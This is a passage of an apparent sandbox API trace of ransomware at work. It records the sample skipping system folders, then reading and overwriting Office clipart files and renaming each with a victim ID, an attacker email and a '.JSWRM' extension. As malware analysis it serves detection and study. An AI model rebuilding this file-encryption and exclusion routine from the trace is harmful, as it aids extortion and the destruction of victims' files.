(hObject=0x314) returned 1 [0082.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0082.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0082.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0082.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0082.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0082.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0082.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0082.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0082.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.691] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0082.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0082.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0082.692] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe78281d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe78281d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7a8a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x36b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107516.WMF", cAlternateFileName="")) returned 1 [0082.692] lstrcmpiW (lpString1="J0107516.WMF", lpString2=".") returned 1 [0082.692] lstrcmpiW (lpString1="J0107516.WMF", lpString2="..") returned 1 [0082.692] lstrcmpiW (lpString1="J0107516.WMF", lpString2="...") returned 1 [0082.692] lstrcmpiW (lpString1="J0107516.WMF", lpString2="windows") returned -1 [0082.692] lstrcmpiW (lpString1="J0107516.WMF", lpString2="recovery") returned -1 [0082.692] lstrcmpiW (lpString1="J0107516.WMF", lpString2="perflogs") returned -1 [0082.692] lstrcmpiW (lpString1="J0107516.WMF", lpString2="documents and settings") returned 1 [0082.692] lstrcmpiW (lpString1="J0107516.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.692] lstrcmpiW (lpString1="J0107516.WMF", lpString2="system volume information") returned -1 [0082.692] lstrcmpiW (lpString1="J0107516.WMF", lpString2="msocache") returned -1 [0082.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0082.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107516.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107516.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107516.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0082.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0082.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107516.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107516.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107516.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0082.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0082.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0082.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0082.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.694] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14008) returned 1 [0082.694] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x36b0) returned 0x24d210 [0082.694] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x36b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x36b0, lpOverlapped=0x0) returned 1 [0082.696] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.696] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x36b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x36b0, lpOverlapped=0x0) returned 1 [0082.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.696] CloseHandle (hObject=0x314) returned 1 [0082.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0082.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0082.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0082.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0082.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0082.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0082.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.697] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0082.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0082.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0082.697] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe78281d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe78281d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe78281d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f0c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107526.WMF", cAlternateFileName="")) returned 1 [0082.697] lstrcmpiW (lpString1="J0107526.WMF", lpString2=".") returned 1 [0082.697] lstrcmpiW (lpString1="J0107526.WMF", lpString2="..") returned 1 [0082.697] lstrcmpiW (lpString1="J0107526.WMF", lpString2="...") returned 1 [0082.697] lstrcmpiW (lpString1="J0107526.WMF", lpString2="windows") returned -1 [0082.697] lstrcmpiW (lpString1="J0107526.WMF", lpString2="recovery") returned -1 [0082.697] lstrcmpiW (lpString1="J0107526.WMF", lpString2="perflogs") returned -1 [0082.697] lstrcmpiW (lpString1="J0107526.WMF", lpString2="documents and settings") returned 1 [0082.698] lstrcmpiW (lpString1="J0107526.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.698] lstrcmpiW (lpString1="J0107526.WMF", lpString2="system volume information") returned -1 [0082.698] lstrcmpiW (lpString1="J0107526.WMF", lpString2="msocache") returned -1 [0082.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0082.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107526.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107526.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107526.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0082.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0082.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107526.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107526.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107526.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0082.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0082.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0082.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.699] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7948) returned 1 [0082.699] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f00) returned 0x205850 [0082.699] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f00, lpOverlapped=0x0) returned 1 [0082.701] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.701] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f00, lpOverlapped=0x0) returned 1 [0082.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.701] CloseHandle (hObject=0x314) returned 1 [0082.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0082.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0082.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0082.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0082.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0082.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.702] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0082.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.702] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe78281d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe78281d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe78281d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a88, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107528.WMF", cAlternateFileName="")) returned 1 [0082.702] lstrcmpiW (lpString1="J0107528.WMF", lpString2=".") returned 1 [0082.702] lstrcmpiW (lpString1="J0107528.WMF", lpString2="..") returned 1 [0082.702] lstrcmpiW (lpString1="J0107528.WMF", lpString2="...") returned 1 [0082.703] lstrcmpiW (lpString1="J0107528.WMF", lpString2="windows") returned -1 [0082.703] lstrcmpiW (lpString1="J0107528.WMF", lpString2="recovery") returned -1 [0082.703] lstrcmpiW (lpString1="J0107528.WMF", lpString2="perflogs") returned -1 [0082.703] lstrcmpiW (lpString1="J0107528.WMF", lpString2="documents and settings") returned 1 [0082.703] lstrcmpiW (lpString1="J0107528.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.703] lstrcmpiW (lpString1="J0107528.WMF", lpString2="system volume information") returned -1 [0082.703] lstrcmpiW (lpString1="J0107528.WMF", lpString2="msocache") returned -1 [0082.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0082.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107528.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107528.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107528.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0082.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0082.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107528.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107528.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107528.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0082.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0082.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0082.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.703] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6792) returned 1 [0082.703] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a80) returned 0x205850 [0082.704] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1a80, lpOverlapped=0x0) returned 1 [0082.705] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.705] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1a80, lpOverlapped=0x0) returned 1 [0082.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.706] CloseHandle (hObject=0x314) returned 1 [0082.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0082.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0082.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0082.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0082.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0082.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0082.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0082.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0082.706] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 